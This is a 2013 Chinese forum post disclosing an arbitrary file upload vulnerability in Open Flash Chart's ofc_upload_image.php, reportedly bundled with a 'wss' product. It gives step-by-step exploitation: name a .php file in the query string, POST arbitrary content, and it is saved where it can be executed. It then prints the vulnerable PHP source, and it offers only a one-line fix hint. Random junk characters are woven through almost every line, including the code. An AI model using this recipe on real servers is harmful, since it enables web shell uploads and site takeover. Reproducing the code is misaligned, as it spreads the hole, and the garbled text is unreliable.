POST 数据漏洞文件执行任意后缀文件保存
/ H8 Y- A8 i' r, u# s+ K 漏洞文件/chart/php-ofc-library/ofc_upload_image.php
1 D. U2 w7 k& b( x: _6 F+ [$ ^9 k$ b- c5 C% q; W2 H( C8 D
利用:! R9 l' p( v) G5 ?9 y) ~1 U
/chart/php-ofc-library/ofc_upload_image.php?name=hfy.php hfy.php 文件名
3 ~8 Z9 E, b' {- I; G1 m: k, E" A: h: g$ C4 v& I$ O' N( l
Post任意数据
; p1 f! \/ ?2 ~5 w! m. b+ p保存位置http://localhost/chart/tmp-upload-images/hfy.php
' d* y i$ G' f# g0 H4 o
! R% h9 ?5 R) b3 U* H: l8 _( @! i- i# L! ~- m
最新版wss漏洞文件,即使是收费版本也有的,在新浪商店部署的demo~9 Z4 {% ?5 i. I3 S
9 i8 W& T! t$ h9 _' Y<?php& U/ v( b* f' p- c
! L! l: i, i4 z$ Q7 r//, K) z5 J: b7 ^1 A
// In Open Flash Chart -> save_image debug mode, you2 d) T" G; g ]5 O* j$ ~1 j
// will see the 'echo' text in a new window.- V5 C. }: ~! q! y
//
) O2 a& e/ a( a9 C: F( p: b5 |, \+ I2 C ]' t
/*
3 u( j+ u0 `6 J* I$ _) }+ a
7 v* x H) p) _5 K2 bprint_r( $_GET );
, ?5 A9 V) k- ~+ @9 z- Wprint_r( $_POST );
t& v, T8 ~3 m+ mprint_r( $_FILES );
+ U1 a+ p( h- K/ @5 _. H8 ^; w
% ^. `; F% C9 u) ]# P# h+ J' hprint_r( $GLOBALS );
3 z8 z7 l0 @' h U# g% V' u9 }print_r( $GLOBALS["HTTP_RAW_POST_DATA"] );
$ @& } n) a5 u' T. T
4 n1 K) e1 M+ ?$ M6 C*/+ t$ M" R- X: B) _
// default path for the image to be stored //6 m& t+ E9 x- [. Z" A( c
$default_path = '../tmp-upload-images/';
/ C A3 P8 v6 H$ U( B
& K! Z4 k: v. M7 Uif (!file_exists($default_path)) mkdir($default_path, 0777, true);
- S% P6 Q6 Z$ ^& W; \, I
# r0 Y- d" r9 l; s; C& H// full path to the saved image including filename //
) s) q, \2 ~% u' B8 f6 @$destination = $default_path . basename( $_GET[ 'name' ] );
* Z O( }6 ?2 T% z% Q
& C: _* d+ R) I; m/ aecho 'Saving your image to: '. $destination;1 ?* M& S0 n4 X7 ^8 N( y
// print_r( $_POST );
- w" [. t9 M7 B9 k// print_r( $_SERVER );6 R0 C. c. l' k x7 Q1 v! J G
// echo $HTTP_RAW_POST_DATA;4 e8 T, @ ^4 B
' p j; P$ _9 ~6 z1 ]2 Z1 Z//
1 ^7 Z+ [1 f0 c! e1 `3 e" Y// POST data is usually string data, but we are passing a RAW .png% Q q9 _4 Y4 @( B$ U
// so PHP is a bit confused and $_POST is empty. But it has saved' o: w) ]0 Z9 _% s; x
// the raw bits into $HTTP_RAW_POST_DATA
' C; `# ]# Z' k; S$ \" J, k//+ N' \ A9 g0 [9 T3 G
5 P4 ~7 m% S1 x
$jfh = fopen($destination, 'w') or die("can't open file");: x' g6 N; f0 L! |! l6 f
fwrite($jfh, $HTTP_RAW_POST_DATA);
6 K5 c, S& m# N z8 c/ M- x6 Ofclose($jfh);
8 {% }4 r5 _8 ]5 I
; R6 _0 w. P( m: e3 {' ~. \2 [// y5 D# N( L* F: E) E4 Y) `$ w
// LOOK:
+ @7 a: G2 q: x//
5 h; F* N' s1 E- C! ~7 zexit();
& L I6 K7 R1 i1 q: U//( u4 m8 K$ l( k1 L4 A
// PHP5:: V# U1 o. N; j# r
//
' R. d' a+ G6 n8 s6 B" Z! m/ A; b* X c/ q; L
, r9 }/ U: @: a# L3 v I' u0 k// default path for the image to be stored //
' V: x( b) w# C5 C6 H( X v$default_path = 'tmp-upload-images/';
& Z4 L6 K g* C l9 X# K/ ^! i: g& t0 d0 V* X& ~
if (!file_exists($default_path)) mkdir($default_path, 0777, true);
' @, ^" z i# u; O* v6 o3 M) H3 n, t/ z0 e/ z3 R7 Z2 V
// full path to the saved image including filename //! Y" t1 q2 f6 T; z
$destination = $default_path . basename( $_FILES[ 'Filedata' ][ 'name' ] );
. j9 p3 Q% a0 b* x' `
2 M! \9 O& h, i }9 C) i+ V// move the image into the specified directory //
* M P) k: B6 Qif (move_uploaded_file($_FILES[ 'Filedata' ][ 'tmp_name' ], $destination)) {
+ `8 P% f5 v& k) S0 k$ q echo "The file " . basename( $_FILES[ 'Filedata' ][ 'name' ] ) . " has been uploaded;";9 Q8 }" Y/ v+ C& W* C/ }
} else {
7 M1 M" j" r( a8 i' v echo "FILE UPLOAD FAILED";
: K: R0 J( Q6 a9 ]}
7 h2 o" k. [1 l/ B% ^6 {) S! j' v
- L, j+ G H) t6 V/ \
. e! y! P6 l2 v& J?>9 F: x( g8 Y3 G$ D; z4 z/ `, d
* p7 L! b! j `9 W6 g# D. e7 J. y; F9 D2 E9 a
# u8 X1 \* s4 z* k! [$ v
. g0 U" Q" @/ f7 B H+ E. ?- V
. c0 }, V* m$ N
: ~% s/ c8 K6 ~4 J K: h修复方案:
5 j: Z. o$ K6 o. B' L9 d2 S这个漏洞文件就是个杯具,怎么破,加权限验证,后缀等验证~,自己搞
# b: ?5 O8 H6 L$ K8 p# R: D6 w- P5 M4 F7 l" i$ d
0 U' w' T2 l0 B7 Z
3 t ~# a( @5 R, l' Z
5 d+ J: e* O7 _7 V. d r& F/ Z9 U |
发表于 2013-2-23 12:38:58
收藏
支持
反对